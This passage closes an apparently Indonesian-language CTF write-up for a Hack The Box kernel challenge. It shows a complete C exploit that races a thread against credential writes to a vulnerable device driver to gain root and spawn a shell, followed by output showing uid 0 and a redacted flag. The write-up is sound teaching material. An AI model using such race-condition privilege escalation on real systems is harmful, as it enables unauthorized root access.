#include</span> <span class="cpf">&lt;pthread.h&gt;</span><span class="cp">
</span>
<span class="cp">#define _GNU_SOURCE
#define DEVICE_PATH     "/dev/mysu"
#define USER_UID        1000
#define ADMIN_UID       1001
#define USER_PASSWORD   "UeS6Lsp("
#define ADMIN_PASSWORD  "pYH4f5Rb"
</span>
<span class="k">struct</span> <span class="n">req_cred_s</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">uid</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">password</span><span class="p">[</span><span class="mi">28</span><span class="p">];</span>
<span class="p">}</span> <span class="n">req</span><span class="p">;</span>

<span class="kt">void</span> <span class="o">*</span><span class="nf">race_thread</span><span class="p">()</span> <span class="p">{</span>
    <span class="k">for</span> <span class="p">(;;)</span> <span class="n">req</span><span class="p">.</span><span class="n">uid</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
    <span class="n">pthread_t</span> <span class="n">t_id</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">fd</span><span class="p">;</span>

    <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">DEVICE_PATH</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"failed open the device.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">memcpy</span><span class="p">(</span><span class="n">req</span><span class="p">.</span><span class="n">password</span><span class="p">,</span> <span class="n">ADMIN_PASSWORD</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">ADMIN_PASSWORD</span><span class="p">));</span>

    <span class="n">pthread_create</span><span class="p">(</span><span class="o">&amp;</span><span class="n">t_id</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">race_thread</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>

    <span class="k">for</span> <span class="p">(;;)</span> <span class="p">{</span>
        <span class="n">req</span><span class="p">.</span><span class="n">uid</span> <span class="o">=</span> <span class="n">ADMIN_UID</span><span class="p">;</span>

        <span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">req</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">req</span><span class="p">));</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">getuid</span><span class="p">()</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">system</span><span class="p">(</span><span class="s">"/bin/sh"</span><span class="p">);</span>
            <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Jalankan di-server dan root didapatkan :)</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/ <span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>user<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>user<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span>user<span class="o">)</span>
...
/ <span class="nv">$ </span>/tmp/hax
/ <span class="c"># id</span>
<span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span>user<span class="o">)</span>
...
/ <span class="c"># cat /flag</span>
HTB<span class="o">{</span>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<span class="o">}</span>
/ <span class="c">#</span>
</code></pre></div></div>

<h2 id="0x04-penutup">0x04 Penutup</h2>

<p>Pada awalnya bingung dengan multithread di <code class="language-plaintext highlighter-rouge">C</code> karena agak aneh diawal karena thread tidak jalan bersamaan, ternyata ada yang salah dikode aku. Great challenge! buatku yang baru pertama kali mengerjakan soal kernel exploitation.</p>

<p>Thanks.</p>

<p><a href="/2022/08/26/kern-adv-part-1.html"></a></p>

<p>:helloworld:</p>

  </div><a class="u-url" href="/2022/08/26/kernel-adventures-part-1.html" hidden></a>
</article>

      </div>
    </main></body>

</html>
